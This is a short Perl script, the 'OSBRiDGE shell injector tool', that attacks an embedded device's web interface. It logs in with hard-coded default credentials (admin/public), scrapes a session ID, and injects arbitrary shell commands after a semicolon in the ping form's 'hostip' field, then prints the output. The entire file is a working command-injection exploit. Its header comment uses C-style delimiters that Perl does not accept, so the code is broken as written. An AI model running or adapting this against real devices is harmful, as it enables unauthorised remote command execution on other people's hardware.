#!/usr/bin/perl -w

/*
	OSBRiDGE shell injector tool
	Copyright 2008 Matteo Croce <matteo@openwrt.org>
 */

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw(GET);

my $ua = LWP::UserAgent->new();

my $req = HTTP::Request->new(GET => 'http://192.168.1.250/cgi-bin/cgi?www=login&login=admin&password=public');

my $content = $ua->request($req)->as_string;

my $id;

if($content =~ /www=applycfg&IDs=(\d{30})/) {
	$id = $1;
} else {
	die "Can't find ID (wrong password?)";
}

my $url = "http://192.168.1.250/cgi-bin/cgi?www=ping&IDs=$id&hostip=127.0.0.1 ; @ARGV >/proc/self/fd/2&packetsize=60&packetcount=1&submit=Ping";

print "[~] @ARGV\n";

$req = HTTP::Request->new(GET => $url);

$content = $ua->request($req)->as_string;

while ($content =~ /^Client-Junk: (.*)/mg) {
	print "$1\n";
}